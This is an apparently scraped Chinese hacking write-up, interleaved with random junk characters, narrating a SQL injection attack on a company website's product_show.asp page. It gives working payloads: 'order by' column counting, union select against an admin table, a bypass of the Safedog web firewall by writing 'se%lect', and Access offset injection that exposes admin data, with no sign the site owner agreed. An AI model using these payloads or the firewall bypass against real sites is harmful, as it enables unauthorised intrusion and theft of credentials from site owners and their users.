打开网站,一个企业站。+ f) \; f# o+ @8 W# U
+ J; A3 X2 A. b: R9 z# j# o% e( s7 L
9 t4 B" X' Z+ ?顺手加个admin- C3 n6 q/ u6 v
, @* F$ u: P4 X$ o0 G
7 b2 a8 O9 c+ B默认后台。
7 d; {2 b- A* Y1 }" o# a" G回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
4 k+ ?- K5 J. p3 H4 J1 v6 T! }% A! L+ p
. p: D. L8 G- U" \5 H; S1 e* y w' Q, H- |4 j6 s% V# t% U6 t! ~* e
所以就不用御剑扫了,待会直接封IP。' I# S* u, r2 Y1 l8 S! k
6 V3 l) K* {1 k5 b
用order by语句判断是否存在注入。
+ `. Y- s% m, bhttp://www.xxx.com /product_show.asp?id=997 order by 1
! z& c! [: i8 l' s: dhttp://www.xxx.com /product_show.asp?id=997 order by 100- a, N& J1 k! S; E
现在存在注入,经测试后发现是9个字段。% g& e. S5 {& b2 L
1 N- z) j0 M3 j8 u- M2 Q接下来进行联合查询,猜是否存在admin表。% W5 S* y* z' q4 H$ ^4 R
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
% b* H1 d0 t$ [1 E5 e0 w, q
0 G! x" N1 m7 i
9 i$ @7 t; z O5 [9 M: V9 b2 n5 S# R3 F# @/ h0 ~+ g$ f/ e- d5 g* |
在select中间加个%,se%lect绕过安全狗。) D0 ]1 |7 @6 L% Z$ c- L
6 B) @$ w1 |/ S! C
/ b9 [, p8 Z! J
发现存在admin表,然后开始手工猜常用的字段。
& y+ H' U+ P) w' Z) ^. p. S/ D纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
: m# H1 E$ ?2 U/ i2 B+ k ( \( h& |$ _9 |0 e9 {. `
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。( G% l E7 d# `! I3 s
4 I* f' n: e) B
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。& O( e( V# T; Z7 Q
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin- X9 c2 K* P: K1 b1 m6 `
好了,敏感内容出显了。 ?+ ?8 V- `1 O! B! O3 c. ]; u3 a! D
. f O' P5 n; W$ u0 K3 V
1 {2 W9 z4 o! o7 H B
9 F ^5 S9 l* x* G- s6 I |